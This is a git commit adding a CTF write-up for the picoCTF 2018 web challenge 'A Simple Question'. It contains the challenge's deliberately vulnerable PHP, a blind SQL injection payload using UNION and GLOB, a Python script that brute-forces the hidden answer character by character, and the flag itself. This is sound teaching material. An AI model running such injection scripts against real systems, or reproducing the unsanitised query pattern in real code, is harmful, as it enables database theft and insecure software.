Added A Simple Question

PlatyPew · PlatyPew · commit 2775dacb0f1c · 2018-10-03T23:18:17.000+08:00
diff --git a/Web Exploitation/A Simple Question/README.md b/Web Exploitation/A Simple Question/README.md
@@ -0,0 +1,70 @@
+# A Simple Question
+Points: 650
+
+## Category
+Web Exploitation
+
+## Question
+>There is a website running at http://2018shell1.picoctf.com:2644 ([link](http://2018shell1.picoctf.com:2644/)). Try to see if you can answer its question. 
+
+### Hint
+No Hints.
+
+## Solution
+Looking at the source code, we can see that this web application is vulnerable to SQL injections.
+
+```php
+include "config.php";
+ini_set('error_reporting', E_ALL);
+ini_set('display_errors', 'On');
+
+$answer = $_POST["answer"];
+$debug = $_POST["debug"];
+$query = "SELECT * FROM answers WHERE answer='$answer'";
+echo "<pre>";
+echo "SQL query: ", htmlspecialchars($query), "\n";
+echo "</pre>";
+```
+
+However, it doesn't appear to print anything out, but just tells you either you're wrong, you're close, or you get the flag
+
+```php
+$con = new SQLite3($database_file);
+$result = $con->query($query);
+
+$row = $result->fetchArray();
+if($answer == $CANARY)  {
+	echo "<h1>Perfect!</h1>";
+	echo "<p>Your flag is: $FLAG</p>";
+}
+elseif ($row) {
+	echo "<h1>You are so close.</h1>";
+} else {
+	echo "<h1>Wrong.</h1>";
+}
+```
+
+Alright, let's create a small injection to slowly brute-force the answer.
+`' UNION SELECT * FROM answers WHERE answer GLOB '<input>*'; --`
+
+We use _GLOB_ instead of _LIKE_ because it's case-sensitive. Also we use _*_ or _%_ because _GLOB_ uses Unix wildcards.
+
+We run the script and get the flag.
+
+```python
+final = ''
+while True:
+	for i in range(0x20, 0x7f):
+		if i != 42 and i != 63: # Removes Unix wildcards '*' and '?'
+			params = {
+				'answer': "' UNION SELECT * FROM answers WHERE answer GLOB '{}{}*'; --".format(final, chr(i))
+			}
+			r = requests.post('http://2018shell1.picoctf.com:2644/answer2.php', data=params)
+			res = r.text
+			print res
+```
+
+Working solution [solve.py](solution/solve.py)
+
+### Flag
+`picoCTF{qu3stions_ar3_h4rd_28fc1206}`
diff --git a/Web Exploitation/A Simple Question/solution/solve.py b/Web Exploitation/A Simple Question/solution/solve.py
@@ -1,19 +1,26 @@
 #!/usr/bin/python
 import requests
+import re
 
-final = '41ANDSIXSIXTHS'
+def brute():
+	final = ''
+	while True:
+		for i in range(0x20, 0x7f):
+			if i != 42 and i != 63: # Removes Unix wildcards '*' and '?'
+				params = {
+					'answer': "' UNION SELECT * FROM answers WHERE answer GLOB '{}{}*'; --".format(final, chr(i))
+				}
+				r = requests.post('http://2018shell1.picoctf.com:2644/answer2.php', data=params)
+				res = r.text
+				print res
 
-#while True:
-for i in range(0x20, 0x7f):
-	if i != 37:
-		params = {
-			'answer': "' UNION SELECT * FROM answers WHERE answer LIKE '{}{}%'; --".format(final, chr(i))
-		}
-		r = requests.post('http://2018shell1.picoctf.com:2644/answer2.php', data=params)
-		res = r.text
-		print res
+			if 'You are so close.' in res:
+				final += chr(i)
+				print final
+				break
+			elif i == 0x7e:
+				return final # 41AndSixSixths
 
-	if 'You are so close.' in res:
-		final += chr(i)
-		print final
-		break
+ans = brute()
+flag = requests.post('http://2018shell1.picoctf.com:2644/answer2.php', data={'answer': ans}).text
+print 'Flag: ' + re.findall(r'(picoCTF\{.+\})', flag)[0]
diff --git a/Web Exploitation/A Simple Question/solution/source/answer2.phps b/Web Exploitation/A Simple Question/solution/source/answer2.phps
@@ -0,0 +1,27 @@
+<?php
+  include "config.php";
+  ini_set('error_reporting', E_ALL);
+  ini_set('display_errors', 'On');
+
+  $answer = $_POST["answer"];
+  $debug = $_POST["debug"];
+  $query = "SELECT * FROM answers WHERE answer='$answer'";
+  echo "<pre>";
+  echo "SQL query: ", htmlspecialchars($query), "\n";
+  echo "</pre>";
+?>
+<?php
+  $con = new SQLite3($database_file);
+  $result = $con->query($query);
+
+  $row = $result->fetchArray();
+  if($answer == $CANARY)  {
+    echo "<h1>Perfect!</h1>";
+    echo "<p>Your flag is: $FLAG</p>";
+  }
+  elseif ($row) {
+    echo "<h1>You are so close.</h1>";
+  } else {
+    echo "<h1>Wrong.</h1>";
+  }
+?>
diff --git a/Web Exploitation/A Simple Question/solution/source/index.html b/Web Exploitation/A Simple Question/solution/source/index.html
@@ -0,0 +1,41 @@
+<!doctype html>
+<html>
+<head>
+    <title>Question</title>
+    <link rel="stylesheet" type="text/css" href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
+</head>
+<body>
+<div class="container">
+    <div class="row">
+        <div class="col-md-12">
+            <div class="panel panel-primary" style="margin-top:50px">
+                <div class="panel-heading">
+                    <h3 class="panel-title">A Simple Question</h3>
+                </div>
+                <div class="panel-body">
+                    <div>
+                        What is the answer?
+                    </div>  
+                    <form action="answer2.php" method="POST">
+<!-- source code is in answer2.phps -->
+                        <fieldset>
+                            <div class="form-group">
+                                <div class="controls">
+                                    <input id="answer" name="answer" class="form-control">
+                                </div>
+                            </div>
+
+                            <input type="hidden" name="debug" value="0">
+
+                            <div class="form-actions">
+                                <input type="submit" value="Answer" class="btn btn-primary">
+                            </div>
+                        </fieldset>
+                    </form>
+                </div>
+            </div>
+        </div>
+    </div>
+</div>
+</body>
+</html>
